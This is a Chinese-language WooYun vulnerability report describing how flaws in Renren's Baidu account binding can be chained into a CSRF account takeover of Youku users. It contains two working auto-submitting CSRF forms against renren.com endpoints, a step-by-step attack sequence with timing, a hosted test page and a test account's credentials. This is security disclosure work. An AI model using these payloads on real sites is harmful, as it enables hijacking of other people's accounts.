WooYun.org

【缺陷一】
----------------------------------------------------------------------------------------
1.当用百度帐号快速登录，如果是是第一次登录，会提示绑定已有用户还是新注册，我选择已有用户

2.这个地方存在两个缺陷

①这个接口，密码输错很多次，一直没有验证码提示???

②.还有这登录的方式，也是醉了,密码是明文的

③.这里关联百度帐号只验证UID，并没有验证cook,怎么知道我的百度帐号是真的在线??
而且也没有token

④.从上面的缺陷，总结，密码多次输错没有验证码，而且是明文登录，只验证百度UID，没有验证百度cook,没有验证我的百度帐号是否真的在线，而且也没有token
（也就是说，下面这段代码，我就能登录人人网站）

<html>
<form id="csrf" name="csrf" action="http://www.renren.com/bind/baidu/rb" method="POST">
<input type="text" name="email" value="[email protected]" />
<input type="text" name="pwd" value="a456a456" />
<input type="text" name="baiduId" value="1931405923" />
</form>
<script>
	document.csrf.submit();
</script>
</body>
</html>

-----------------------------------------------------------------------------------------
【缺陷二】
1。上面那段代码，只能登录一次，第二次用同一个帐号，会提示XXXXX帐号已绑定百度帐号
，所以再去看看解绑百度帐号接口

2.截取这个的解绑请求，虽然有token,和_rk.这两个参数只是摆设

3.简化后的post请求,这个请求就能解除百度帐号绑定

<html>
<form id="csrf" name="csrf" action="http://www.renren.com/bind/iourbs" method="POST">
<input type="text" name="bindType" value="7" />
<input type="text" name="rid" value="877317482" />
<input type="text" name="status" value="0" />
<input type="text" name="thirdPartyId" value="1931405923" />
</form>
<script>
	document.csrf.submit();
</script>
</body>
</html>

4.【缺陷一】登录自己的帐号，再利用缺陷【缺陷二】解绑百度帐号，可以实现无限登录自己的人人帐号
---------------------------------------------------------------------------------------
【缺陷三】（这里是优酷举例子）
1.在优酷，使用绑定人人网的帐号的功能，优酷会先打开

http://i.youku.com/partner_thirdPartOnlyBind/tlsite_renren_tlclient_ykwebb

2.然后会直接跳到这个地址

http://passport.youku.com/partner_thirdLoginCallback?tlsite=renren&tlclient=ykwebb&code=rea8lhAOf1sLqsu8BZf52PUkqKVGUiOx&state=0dd213a53c8d89e6637429b6e609277f&authcallback=http%3A%2F%2Fpassport.youku.com%2Fpartner_unifiedThirdpartCallback&tlsite=renren&origrurl=http%3A%2F%2Fpassport.youku.com%2Fpartner_unifiedThirdpartCallback

3.接着会提示，绑定成功

4.一个人人网帐号在关联优酷网站的时候，只有第一次会提示授权连接，所以只要授权了，这个帐号以后只要访问这个连接就能直接跳到绑定人人网成功的帐号界面

http://i.youku.com/partner_thirdPartOnlyBind/tlsite_renren_tlclient_ykwebb

--------------------------------------------------------------------------------------------
最后总结了
1.利用【缺陷一】，在对方的电脑登录自己的人人网站帐号
2.利用【缺陷二】，解除自己的帐号和百度帐号的绑定吗，为了下次能继续用这个接口登录
3.在别的网站使用人人绑定关联帐号功能，只要第一次授权过的，接下来直接访问这个连接，就能直接跳到人人网站成功绑定的

http://i.youku.com/partner_thirdPartOnlyBind/tlsite_renren_tlclient_ykwebb

--------------------------------------------------------------------------------------
利用方式：

当目标访问的时候，我先设置，解除对方的优酷绑定的人人（为了能绑定上自己的），再在对方的电脑登录自己的人人网，再利用关联帐号的缺陷，把自己的人人网站和目标的优酷帐号进行绑定，再解除自己的人人网帐号和百度帐号的关联,这样我就能我用自己的人人网的帐号登录对方的优酷帐号了
------------------------------------------------------------------------------------------
下面是测试图
1.这个时候人人网站帐号没有登录，我的优酷帐号也没有绑定

2.当目标打开的网站的时候，会先解除目标的优酷他自己的人人帐号绑定

3.接下来延迟一秒，登录我的人人网的帐号,

4.接下来再延迟三秒，通过这个连接，绑定我的人人网站帐号和目标的优酷帐号

http://i.youku.com/partner_thirdPartOnlyBind/tlsite_renren_tlclient_ykwebb

5.然后之后再解除，我的人人帐号和百度帐号的关联，为了那个接口能重复使用，不然会提示XXXX帐号已经关联百度帐号了

---------------------------------------------------------------------------------------------
1.然后当代码执行完成的时候，对方的优酷帐号已经绑定我的人人网帐号了，我可以通过人人网的帐号登录他的优酷帐号了

2.这个时候我的人人网帐号已经登录，而且对方的优酷也绑定了我的优酷帐号了

---------------------------------------------------------------------------------------------
自己写了好了一个完成的测试网页

http://fripside.sinaapp.com/renrenjiechi.html

(测试的人可以先登录自己的优酷，然后访问这个地址，就能关联上我的人人网帐号了
如果人人网站没登录成功，可以使用：帐号：[email protected] 密码：a456a456,把百度帐号关联解除掉，就不会提示XXX帐号已经关联百度帐号了,其实我设置了登录人人网的帐号之后解除百度帐号关联，为了下次测试能使用，一般等网页弹窗结束，不会出现这问题))